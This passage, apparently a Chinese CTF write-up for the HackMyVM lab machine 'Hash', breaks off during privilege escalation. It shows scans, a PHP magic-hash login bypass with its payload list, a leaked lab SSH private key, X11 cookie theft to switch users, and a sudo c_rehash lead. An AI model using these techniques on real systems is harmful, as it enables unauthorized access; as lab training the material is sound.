{"id":857,"date":"2025-06-11T22:38:02","date_gmt":"2025-06-11T14:38:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=857"},"modified":"2025-06-11T22:38:02","modified_gmt":"2025-06-11T14:38:02","slug":"hmv-_-hash","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/857\/06\/11\/2025\/","title":{"rendered":"hmv[-_-]Hash"},"content":{"rendered":"

Hash<\/h1>\n

\"image-20250610234643118\"<\/div>
\n
\"image-20250611171841901\"<\/div><\/p>\n

\u540e\u53f0\u5728\u66f4\u65b0\uff0c\u53ef\u80fd\u51fa\u73b0\u4e0d\u53ef\u540d\u72b6\u7684bug\u3002\u3002\u3002\u3002<\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hash]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we're dating.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\nOpen 192.168.10.100:3389\n\nPORT     STATE SERVICE       REASON         VERSION\n22\/tcp   open  ssh           syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 1e:fb:86:3d:cf:26:a2:a0:ae:b0:00:61:0b:41:cb:ab (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCoCe5dAHvewBGEc4ECXkJ\/Rxt33hDe1nw6gVDfxAPmboI9Q8kGeRLcvkAmfMEdmz8rsZvf3BqESajjFZQkMO4sCYqGLdGpHtemOqE7v5z1YIBcKFbR2SP5VbHTkJXx1D7Ix3xJ1uEtGSQBWjznij5yQUGObsfv72G9r8mGiYl+2RVUtN3MMcYPz2jwPoqrko9XgZOuG0xQfGh9hH+M6KBYPVLMfw7dp\/NQPNyMXzMrE1cpQo7fqMae0gNmKbqrQWbXKCGYFMlO8ZDgIrD5kGvXNgmI86vKPobU38ffYc+OhBUipph4kD\/lC2cxTEu1PfC1CkmzM2TcmmYk0LWgi\/Mh\n|   256 80:8e:46:7b:1d:6e:13:74:22:89:ad:91:b4:44:64:ec (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAnqUdqIHs914Wc+1I2ZeXd5GLJls74P6Pbtsut7SGHSlJ91ZPVmDVA\/X6b4ZrjPJ5VmZlTJb51kGHKyuEqzry8=\n|   256 71:e5:e1:4f:34:16:de:ec:b5:c4:fe:f5:0a:a2:ee:fc (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOmxCKUt9o37nv2NRczn9vy2dqm6STx+CtPFKW8d5VHd\n80\/tcp   open  http          syn-ack ttl 64 nginx 1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.14.2\n|_http-title: LOGIN\n3389\/tcp open  ms-wbt-server syn-ack ttl 64 Microsoft Terminal Service\nMAC Address: 08:00:27:79:C1:34 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OSs: Linux, Windows; CPE: cpe:\/o:linux:linux_kernel, cpe:\/o:microsoft:windows<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u2514\u2500$ feroxbuster -u http:\/\/$IP -x php html txt -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt 2>\/dev\/null\n\n404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET       13l       38w      453c http:\/\/192.168.10.100\/index.html\n200      GET        1l        2w       19c http:\/\/192.168.10.100\/check.php\n200      GET       13l       38w      453c http:\/\/192.168.10.100\/\n[####################] - 7m    882188\/882188  0s      found:3       errors:0      \n[####################] - 7m    882184\/882184  2077\/s  http:\/\/192.168.10.100\/  <\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20250611173653610\"<\/div><\/p>\n
\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n
<!doctype html>\n<html lang="en">\n<title>LOGIN<\/title>\n\n    <form class="form-signin" action="check.php" method="post">\n\n      <input type="text" autocomplete="off" id="user" name="user" name="user" placeholder="Username" required autofocus>\n      <input type="password" name="password" id="password" placeholder="Password" required>\n      <input type="submit" value="Login">\n    <\/form>\n<!-- Marco, remember to delete the .bak file-->\n  <\/body>\n<\/html>\n<\/code><\/pre>\n
\u5c1d\u8bd5\u641c\u96c6\u4e00\u4e0b\u5907\u4efd\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hash]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x bak \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.100\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/check.bak            (Status: 200) [Size: 273]\nProgress: 441120 \/ 441122 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u5f31\u6bd4\u8f83\u7ed5\u8fc7<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hash]\n\u2514\u2500$ curl -s http:\/\/$IP\/check.bak                                                                                                                 \n<?php\n\/\/ Login part.\n$pass = $_POST['password'];\n\/\/marco please dont use md5, is not secure.\n\/\/$passwordhashed = hash('md5', $pass);\n$passwordhashed = hash('sha256',$pass);\nif ($passwordhashed == '0e0001337') {\n\/\/Your code here\n}\nelse{\n\/\/Another code here\n}\n\/\/To finish\n?><\/code><\/pre>\n
\u662f\u82e5\u6bd4\u8f83\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u524d\u9762\u52a00e<\/code>\u8fdb\u884c\u7ed5\u8fc7\uff0c\u5177\u4f53\u53ef\u4ee5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u5e93 https:\/\/github.com\/spaze\/hashes\/tree\/master<\/a> \u627e\u5230\u7b26\u5408\u6761\u4ef6\u7684\uff1a<\/p>\n
34250003024812:0e46289032038065916139621039085883773413820991920706299695051332\nTyNOQHUS:0e66298694359207596086558843543959518835691168370379069085300385\nCGq'v]`1:0e24075800390395003020016330244669256332225005475416462877606139\n\\}Fr@!-a:0e72388986848908063143227157175161069826054332235509517153370253\n|+ydg uahashcat:0e47232208479423947711758529407170319802038822455916807443812134\n8W-vW:5ghashcat:0e99625202804787226908207582077273485674961623832383874594371630 (note: the plaintext has a colon in the middle)\nmz586Ostt0:0e68778243444544519255778909858576221322537110103676691840647395\nSol7trnk00:0e57289584033733351592613162328254589214408593566331187698889096\nNzQEVVCN10:0e92299296652799688472441889499080435414654298793501210067779366\nZ664cnsb60:0e51257675595021973950657753067030245565435125968551772003589958\njF7qQUmx70:0e04396813052343573929892122002074460952498169617805703816566529\n0e9682187459792981:0e84837923611824342735254600415455016861658967528729588256413411\n0e9377421626279222:0e48575090397052833642912654053751294419348146401806328515618635<\/code><\/pre>\n
\u968f\u4fbf\u641e\u4e00\u4e2a\u5f97\u5230\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hash]\n\u2514\u2500$ curl -s http:\/\/$IP\/check.php -d "password=34250003024812"\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAxiKdFmWJiVfVYaNGov1xuh0\/nrXnNsx2s6g5IoIJrmkX+9qzt2US\nZWMgrjLzAyB3wrLFysCPh4F8GU87pJkbpc0prM\/8vB2WJCg5ktDQ6o0vwH219sPKUS4e9R\ns2bPz7CJX5bzFDQ3B6ZUOs1itZ1t\/uq38XuCxDjI8XxU6fusB3Rjz2XIombtFwo78W1pkX\nVnQhzZOQ+b8UaC5lZeKatcZ0xdc0iQgiAbcRN7sXYCDMxMmo9KsxqzWjd56hLrv1nsTy2t\nVBXzDRw+5JU4AJlGDRB\/Upq\/oKbGDCOmgNUsJPQKW4TgEAWhUa+t\/ue2Bs\/wFjCY7w\/LkY\npK4bnY5eHQAAA8C\/pv23v6b9twAAAAdzc2gtcnNhAAABAQDGIp0WZYmJV9Vho0ai\/XG6HT\n+etec2zHazqDkiggmuaRf72rO3ZRJlYyCuMvMDIHfCssXKwI+HgXwZTzukmRulzSmsz\/y8\nHZYkKDmS0NDqjS\/AfbX2w8pRLh71GzZs\/PsIlflvMUNDcHplQ6zWK1nW3+6rfxe4LEOMjx\nfFTp+6wHdGPPZciiZu0XCjvxbWmRdWdCHNk5D5vxRoLmVl4pq1xnTF1zSJCCIBtxE3uxdg\nIMzEyaj0qzGrNaN3nqEuu\/WexPLa1UFfMNHD7klTgAmUYNEH9Smr+gpsYMI6aA1Swk9Apb\nhOAQBaFRr63+57YGz\/AWMJjvD8uRikrhudjl4dAAAAAwEAAQAAAQEAlMcLA\/VMmGfu33kW\nIm+DRUiPLCLVMo3HmFH6TRIuKNvbWY+4oT5w2NbdhFDXr4Jiyz0oTn3XiN3PDMY1N\/yMCS\n0MXSp0UeE5i3709Gx+Y5GOyNDcoSYVtm2Wa2B6ts4jxievfDIWmv5LudxeXReCR1oxQm+V\npQL\/2fzc0ZifUj+\/VSSIltgDKHxEfebfK0xShgXTSlUhickSapre2ArSdplM\/rYvZLDWmd\niGkGD3VnAgRtloy5v32vPI3M++OCrHbLxgff4odAjawejPPHVj3beMgCrqwb\/CCNKEyWKc\nJkjjt7nY\/GUW4RfzM34LplezpmvrsLkTVMAb3KflDkDPFQAAAIBrP6Pnz0t8d\/M+4hEb66\nIkrftwqMC+c8Z0HMGURTMco7jXfoXaVP3eWCafEZ\/RobZm0Ob1mnBZ574Qn8ai5VLPyJz6\n5Ibe1Z6LWu6yCL\/VFNyksnVARIuVjQt9pXpzbXOfn0H4ZHRBFyRhNHGjnft1PA59O30Dpw\nUVz9eO3K2EqQAAAIEA4baQFa4RYnZ\/YK4F6acjsAPhk88poLjDT86eCQ08wO5+d8BGuSHE\n+BAqCZJuJTvvozYpZ5NFW4OEG9+T\/HX2tvB6Ucc1pbQNNnB7CBp\/VoLLTW+nuU3YJbgYlx\nVnWRRudD6K7wjZEHJ44XzLdTy2wyeUvZw\/iJRZmqQ5hxXCD1MAAACBAOC4ucZotWaq\/pb5\nV5RqLV8HU+DWFHAIfvqtYI5wCcZmAjGtXgLF1HY9MZ3bRPz2\/m7cB44cdgCRbtmqBvnOvn\n6h9AS4gr1HOJEpjgohkxBTc2Mf\/dpCCdcNCX2Xy5ExPSilbS2rUHHCIU2J\/yZGTths8fBR\ncEjmSYvt0qFY\/t7PAAAACm1hcmNvQGhhc2g=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u5c1d\u8bd5\u5229\u7528\u8fd9\u4e2a\u51ed\u8bc1\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662f\u53d1\u73b0\u4e0d\u77e5\u9053\u7528\u6237\u540d\uff0c\u8fd8\u662f\u5f97\u4fe1\u606f\u641c\u96c6\u3002<\/p>\n
\u6ce8\u610f\u5230\u524d\u9762\u6709\u4e00\u4e2a\u6ce8\u91ca\u662f\u8fd9\u4e48\u5199\u7684\/\/marco please dont use md5, is not secure.<\/code>\uff0c\u6709\u6ca1\u6709\u53ef\u80fd\u7528\u6237\u540d\u5c31\u662f\u8fd9\u4e2amarco<\/code>\uff0c\u89e3\u4e00\u4e0b\u8fd9\u4e2aid_rsa<\/code>\u770b\u770b\u5bf9\u4e0d\u5bf9\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hash]\n\u2514\u2500$ ssh-keygen -y -f id_rsa\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGIp0WZYmJV9Vho0ai\/XG6HT+etec2zHazqDkiggmuaRf72rO3ZRJlYyCuMvMDIHfCssXKwI+HgXwZTzukmRulzSmsz\/y8HZYkKDmS0NDqjS\/AfbX2w8pRLh71GzZs\/PsIlflvMUNDcHplQ6zWK1nW3+6rfxe4LEOMjxfFTp+6wHdGPPZciiZu0XCjvxbWmRdWdCHNk5D5vxRoLmVl4pq1xnTF1zSJCCIBtxE3uxdgIMzEyaj0qzGrNaN3nqEuu\/WexPLa1UFfMNHD7klTgAmUYNEH9Smr+gpsYMI6aA1Swk9ApbhOAQBaFRr63+57YGz\/AWMJjvD8uRikrhudjl4d marco@hash<\/code><\/pre>\n
\u53d1\u73b0\u6b63\u786e\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
\"image-20250611195111367\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
marco@hash:~$ ls -la\ntotal 196\ndrwxr-xr-x 16 marco marco  4096 Feb  5  2021 .\ndrwxr-xr-x  4 root  root   4096 Feb  5  2021 ..\n-rw-r--r--  1 marco marco   220 Feb  5  2021 .bash_logout\n-rw-r--r--  1 marco marco  3526 Feb  5  2021 .bashrc\ndrwxr-xr-x  4 marco marco  4096 Feb  5  2021 .cache\ndrwxr-xr-x  5 marco marco  4096 Feb  5  2021 .config\ndrwxr-xr-x  2 marco marco  4096 Feb  5  2021 Desktop\n-rw-r--r--  1 marco marco    35 Feb  5  2021 .dmrc\ndrwxr-xr-x  2 marco marco  4096 Feb  5  2021 Documents\ndrwxr-xr-x  2 marco marco  4096 Feb  5  2021 Downloads\n-rwx------  1 marco marco  1920 Feb  5  2021 flag.sh\n-rw-------  1 marco marco     0 Feb  5  2021 .ICEauthority\ndrwxr-xr-x  3 marco marco  4096 Feb  5  2021 .local\ndrwxr-xr-x  2 marco marco  4096 Feb  5  2021 Music\ndrwxrwxrwt  2 marco marco  4096 Feb  5  2021 .pcsc11\ndrwxr-xr-x  2 marco marco  4096 Feb  5  2021 Pictures\n-rw-r--r--  1 marco marco   807 Feb  5  2021 .profile\ndrwxr-xr-x  2 marco marco  4096 Feb  5  2021 Public\ndrwx------  2 marco marco  4096 Feb  5  2021 .ssh\ndrwxr-xr-x  2 marco marco  4096 Feb  5  2021 Templates\ndrwxr-xr-t  2 marco marco  4096 Feb  5  2021 thinclient_drives\n-rw-------  1 marco marco    13 Feb  5  2021 user.txt\ndrwxr-xr-x  2 marco marco  4096 Feb  5  2021 Videos\n-rw-r--r--  1 marco marco    15 Feb  5  2021 .x\n-rw-------  1 marco marco   149 Feb  5  2021 .Xauthority\n-rw-r--r--  1 marco marco 20783 Feb  5  2021 .xfce4-session.verbose-log\n-rw-r--r--  1 marco marco 14157 Feb  5  2021 .xfce4-session.verbose-log.last\n-rw-r--r--  1 marco marco 20480 Feb  5  2021 .xorgxrdp.11.log\n-rw-r--r--  1 marco marco 14967 Feb  5  2021 .xorgxrdp.11.log.old\n-rw-------  1 marco marco  2630 Feb  5  2021 .xsession-errors\n-rw-------  1 marco marco 17132 Feb  5  2021 .xsession-errors.old\nmarco@hash:~$ .\/flag.sh \n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: hash\n\\nPWNED DATE: Wed 11 Jun 2025 07:51:35 AM EDT\n\\nWHOAMI: uid=1000(marco) gid=1000(marco) groups=1000(marco),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: hashmanready\n\\n------------------------\nmarco@hash:~$ cat user.txt \nhashmanready\nmarco@hash:~$ cat .x\nmarcothehasher\nmarco@hash:~$ ls -la \/home\/\ntotal 16\ndrwxr-xr-x  4 root  root  4096 Feb  5  2021 .\ndrwxr-xr-x 19 root  root  4096 Feb  5  2021 ..\ndrwxr-xr-x 16 marco marco 4096 Feb  5  2021 marco\ndrwxr-xr-x  3 maria maria 4096 Feb  5  2021 maria\nmarco@hash:~$ cd ..\/maria\nmarco@hash:\/home\/maria$ ls -la\ntotal 32\ndrwxr-xr-x 3 maria maria 4096 Feb  5  2021 .\ndrwxr-xr-x 4 root  root  4096 Feb  5  2021 ..\n-rw-r--r-- 1 maria maria  220 Feb  5  2021 .bash_logout\n-rw-r--r-- 1 maria maria 3526 Feb  5  2021 .bashrc\ndrwxr-xr-x 3 maria maria 4096 Feb  5  2021 .local\n-rwxr-xr-x 1 maria maria   25 Feb  5  2021 myterm.sh\n-rw-r--r-- 1 maria maria  807 Feb  5  2021 .profile\n-rw-r--r-- 1 maria maria   66 Feb  5  2021 .selected_editor\n-rwxrwxrwx 1 maria maria    0 Feb  5  2021 .Xauthority\nmarco@hash:\/home\/maria$ cat myterm.sh \nexport DISPLAY=:10\nxterm<\/code><\/pre>\n
\u6267\u884c\u811a\u672c\u5207\u6362\u7ec8\u7aef<\/h3>\n
\u4e0d\u77e5\u9053\u5565\u610f\u601d\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n
\n
    \n
  • \u544a\u8bc9\u7535\u8111\u4e0a\u7684\u56fe\u5f62\u7a0b\u5e8f\uff08\u6bd4\u5982 xterm<\/code>\uff09\uff0c\u628a\u7a97\u53e3\u663e\u793a\u5230\u7f16\u53f7\u4e3a :10<\/code> \u7684\u5c4f\u5e55\u4e0a\u3002<\/li>\n
  • \u6253\u5f00\u4e00\u4e2a\u547d\u4ee4\u884c\u7a97\u53e3\uff08\u9ed1\u5e95\u767d\u5b57\u7684\u7ec8\u7aef\u754c\u9762\uff09\u3002<\/li>\n<\/ul>\n<\/blockquote>\n
    \u5c1d\u8bd5\u6267\u884c\u4e00\u4e0b\uff1a<\/p>\n
    marco@hash:\/home\/maria$ .\/myterm.sh \nxterm: Xt error: Can't open display: :10\n<\/code><\/pre>\n
    \u8fd9\u662f\u56e0\u4e3a\u901a\u8fc7 SSH \u8fde\u63a5\u8fdc\u7a0b\u670d\u52a1\u5668\u65f6\u65e0\u6cd5\u663e\u793a\u56fe\u5f62\u754c\u9762\u3002\u8fdc\u7a0b\u8fde\u63a5\u7684\u65f6\u5019\u5c1d\u8bd5\u6539\u4e00\u4e0b\u9009\u9879\uff0c-Y<\/code>\u5141\u8bb8\u8f6c\u53d1\uff1a<\/p>\n
    \"image-20250611200717936\"<\/div><\/p>\n
    \u5f39\u8fc7\u6765\u4e00\u4e2ashell\uff0c\u4f46\u662f\u662fmarco\u7684\u7ec8\u7aef\uff01\u5c1d\u8bd5\u4fee\u6539\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\uff0c\u4f7f\u5176\u5f39\u56demaria<\/code>\u7684shell\uff01<\/p>\n
    \n
    .Xauthority<\/code> \u662f Linux\/X Window \u7cfb\u7edf\u4e2d\u7528\u4e8e \u56fe\u5f62\u754c\u9762\u8eab\u4efd\u9a8c\u8bc1<\/strong> \u7684\u9690\u85cf\u6587\u4ef6\uff0c\u6838\u5fc3\u4f5c\u7528\u662f\u5b58\u50a8\u7528\u6237\u7684\u201c\u94a5\u5319\u201d\uff08\u6388\u6743\u4fe1\u606f\uff09<\/strong><\/p>\n<\/blockquote>\n
    marco@hash:\/home\/maria$ ls -la\ntotal 32\ndrwxr-xr-x 3 maria maria 4096 Feb  5  2021 .\ndrwxr-xr-x 4 root  root  4096 Feb  5  2021 ..\n-rw-r--r-- 1 maria maria  220 Feb  5  2021 .bash_logout\n-rw-r--r-- 1 maria maria 3526 Feb  5  2021 .bashrc\ndrwxr-xr-x 3 maria maria 4096 Feb  5  2021 .local\n-rwxr-xr-x 1 maria maria   25 Feb  5  2021 myterm.sh\n-rw-r--r-- 1 maria maria  807 Feb  5  2021 .profile\n-rw-r--r-- 1 maria maria   66 Feb  5  2021 .selected_editor\n-rwxrwxrwx 1 maria maria    0 Feb  5  2021 .Xauthority\nmarco@hash:\/home\/maria$ cat .Xauthority\nmarco@hash:\/home\/maria$ xauth list $DISPLAY\nhash\/unix:11  MIT-MAGIC-COOKIE-1  c50ca26b23a37cd020519c0f824503f8\nhash\/unix:0  MIT-MAGIC-COOKIE-1  6d6272a70ffe8bbe8b3c72c5ec8ba46b\nhash\/unix:10  MIT-MAGIC-COOKIE-1  cc2188de2535cc4ff95173e0c514737d<\/code><\/pre>\n
    \u5c1d\u8bd5\u8fdb\u884c\u66ff\u6362\u4e00\u4e0b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u5f39\u56de\u6b63\u786e\u7684\uff1a<\/p>\n
    marco@hash:\/home\/maria$ cp ..\/marco\/.Xauthority .Xauthority \nmarco@hash:\/home\/maria$ ls -la\ntotal 36\ndrwxr-xr-x 3 maria maria 4096 Feb  5  2021 .\ndrwxr-xr-x 4 root  root  4096 Feb  5  2021 ..\n-rw-r--r-- 1 maria maria  220 Feb  5  2021 .bash_logout\n-rw-r--r-- 1 maria maria 3526 Feb  5  2021 .bashrc\ndrwxr-xr-x 3 maria maria 4096 Feb  5  2021 .local\n-rwxr-xr-x 1 maria maria   25 Feb  5  2021 myterm.sh\n-rw-r--r-- 1 maria maria  807 Feb  5  2021 .profile\n-rw-r--r-- 1 maria maria   66 Feb  5  2021 .selected_editor\n-rwxrwxrwx 1 maria maria  149 Jun 11 09:06 .Xauthority<\/code><\/pre>\n
    \"image-20250611213605992\"<\/div><\/p>\n
    \u5c1d\u8bd5\u5f39\u56deshell\uff01<\/p>\n
    \"image-20250611213828112\"<\/div>
    \n
    \"image-20250611213851685\"<\/div><\/p>\n
    Maria\u4fe1\u606f\u641c\u96c6<\/h3>\n
    (remote) maria@hash:\/home\/maria$ ls -la\ntotal 36\ndrwxr-xr-x 3 maria maria 4096 Feb  5  2021 .\ndrwxr-xr-x 4 root  root  4096 Feb  5  2021 ..\n-rw-r--r-- 1 maria maria  220 Feb  5  2021 .bash_logout\n-rw-r--r-- 1 maria maria 3526 Feb  5  2021 .bashrc\ndrwxr-xr-x 3 maria maria 4096 Feb  5  2021 .local\n-rwxr-xr-x 1 maria maria   25 Feb  5  2021 myterm.sh\n-rw-r--r-- 1 maria maria  807 Feb  5  2021 .profile\n-rw-r--r-- 1 maria maria   66 Feb  5  2021 .selected_editor\n-rwxrwxrwx 1 maria maria  149 Jun 11 09:06 .Xauthority\n(remote) maria@hash:\/home\/maria$ sudo -l\nMatching Defaults entries for maria on hash:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser maria may run the following commands on hash:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/c_rehash\n(remote) maria@hash:\/home\/maria$ file \/usr\/bin\/c_rehash\n\/usr\/bin\/c_rehash: Perl script text executable\n(remote) maria@hash:\/home\/maria$ cat \/usr\/bin\/c_rehash\n#!\/usr\/bin\/perl\n\n# WARNING: do not edit!\n# Generated by Makefile from ..\/tools\/c_rehash.in\n# Copyright 1999-2018 The OpenSSL Project Authors. All Rights Reserved.\n#\n# Licensed under the OpenSSL license (the "License").  You may not use\n# this file except in compliance with the License.  You can obtain a copy\n# in the file LICENSE in the source distribution or at\n# https:\/\/www.openssl.org\/source\/license.html\n\n# Perl c_rehash script, scan all files in a directory\n# and add symbolic links to their hash values.\n\nmy $dir = "\/usr\/lib\/ssl";\nmy $prefix = "\/usr";\n\nmy $errorcount = 0;\nmy $openssl = $ENV{OPENSSL} || "openssl";         # \u4e0d\u5bf9\u52b2\uff0c\u6709\u95ee\u9898\u55f7\uff01\uff01\uff01\uff01\nmy $pwd;\nmy $verbose = 0;\nmy $symlink_exists=eval {symlink("",""); 1};\nmy $removelinks = 1;\n\n##  Parse flags.\nwhile ( $ARGV[0] =~ \/^-\/ ) {\n    my $flag = shift @ARGV;\n    last if ( $flag eq '--');\n    if ( $flag eq '-h' || $flag eq '-help' ) {\n            help();\n    } elsif ( $flag eq '-n' ) {\n            $removelinks = 0;\n    } elsif ( $flag eq '-v' ) {\n            $verbose++;\n    }\n    else {\n            print STDERR "Usage error; try -h.\\n";\n            exit 1;\n    }\n}\n\nsub help {\n        print "Usage: c_rehash [-old] [-h] [-help] [-v] [dirs...]\\n";\n        print "   -old use old-style digest\\n";\n        print "   -h or -help print this help text\\n";\n        print "   -v print files removed and linked\\n";\n        exit 0;\n}\n\neval "require Cwd";\nif (defined(&Cwd::getcwd)) {\n        $pwd=Cwd::getcwd();\n} else {\n        $pwd=`pwd`;\n        chomp($pwd);\n}\n\n# DOS\/Win32 or Unix delimiter?  Prefix our installdir, then search.\nmy $path_delim = ($pwd =~ \/^[a-z]\\:\/i) ? ';' : ':';\n$ENV{PATH} = "$prefix\/bin" . ($ENV{PATH} ? $path_delim . $ENV{PATH} : "");\n\nif (! -x $openssl) {\n        my $found = 0;\n        foreach (split \/$path_delim\/, $ENV{PATH}) {\n                if (-x "$_\/$openssl") {\n                        $found = 1;\n                        $openssl = "$_\/$openssl";\n                        last;\n                }\n        }\n        if ($found == 0) {\n                print STDERR "c_rehash: rehashing skipped ('openssl' program not available)\\n";\n                exit 0;\n        }\n}\n\nif (@ARGV) {\n        @dirlist = @ARGV;\n} elsif ($ENV{SSL_CERT_DIR}) {\n        @dirlist = split \/$path_delim\/, $ENV{SSL_CERT_DIR};\n} else {\n        $dirlist[0] = "$dir\/certs";\n}\n\nif (-d $dirlist[0]) {\n        chdir $dirlist[0];\n        $openssl="$pwd\/$openssl" if (!-x $openssl);\n        chdir $pwd;\n}\n\nforeach (@dirlist) {\n        if (-d $_ ) {\n            if ( -w $_) {\n                hash_dir($_);\n            } else {\n                print "Skipping $_, can't write\\n";\n                $errorcount++;\n            }\n        }\n}\nexit($errorcount);\n\nsub hash_dir {\n        my %hashlist;\n        print "Doing $_[0]\\n";\n        chdir $_[0];\n        opendir(DIR, ".");\n        my @flist = sort readdir(DIR);\n        closedir DIR;\n        if ( $removelinks ) {\n                # Delete any existing symbolic links\n                foreach (grep {\/^[\\da-f]+\\.r{0,1}\\d+$\/} @flist) {\n                        if (-l $_) {\n                                print "unlink $_" if $verbose;\n                                unlink $_ || warn "Can't unlink $_, $!\\n";\n                        }\n                }\n        }\n        FILE: foreach $fname (grep {\/\\.(pem)|(crt)|(cer)|(crl)$\/} @flist) {\n                # Check to see if certificates and\/or CRLs present.\n                my ($cert, $crl) = check_file($fname);\n                if (!$cert && !$crl) {\n                        print STDERR "WARNING: $fname does not contain a certificate or CRL: skipping\\n";\n                        next;\n                }\n                link_hash_cert($fname) if ($cert);\n                link_hash_cert_old($fname) if ($cert);\n                link_hash_crl($fname) if ($crl);\n                link_hash_crl_old($fname) if ($crl);\n        }\n}\n\nsub check_file {\n        my ($is_cert, $is_crl) = (0,0);\n        my $fname = $_[0];\n        open IN, $fname;\n        while(<IN>) {\n                if (\/^-----BEGIN (.*)-----\/) {\n                        my $hdr = $1;\n                        if ($hdr =~ \/^(X509 |TRUSTED |)CERTIFICATE$\/) {\n                                $is_cert = 1;\n                                last if ($is_crl);\n                        } elsif ($hdr eq "X509 CRL") {\n                                $is_crl = 1;\n                                last if ($is_cert);\n                        }\n                }\n        }\n        close IN;\n        return ($is_cert, $is_crl);\n}\n\n# Link a certificate to its subject name hash value, each hash is of\n# the form <hash>.<n> where n is an integer. If the hash value already exists\n# then we need to up the value of n, unless its a duplicate in which\n# case we skip the link. We check for duplicates by comparing the\n# certificate fingerprints\n\nsub link_hash_cert {\n                my $fname = $_[0];\n                my $x509hash = $_[1] || '-subject_hash';\n                $fname =~ s\/'\/'\\\\''\/g;\n                my ($hash, $fprint) = `"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"`;\n                chomp $hash;\n                chomp $fprint;\n                $fprint =~ s\/^.*=\/\/;\n                $fprint =~ tr\/:\/\/d;\n                my $suffix = 0;\n                # Search for an unused hash filename\n                while(exists $hashlist{"$hash.$suffix"}) {\n                        # Hash matches: if fingerprint matches its a duplicate cert\n                        if ($hashlist{"$hash.$suffix"} eq $fprint) {\n                                print STDERR "WARNING: Skipping duplicate certificate $fname\\n";\n                                return;\n                        }\n                        $suffix++;\n                }\n                $hash .= ".$suffix";\n    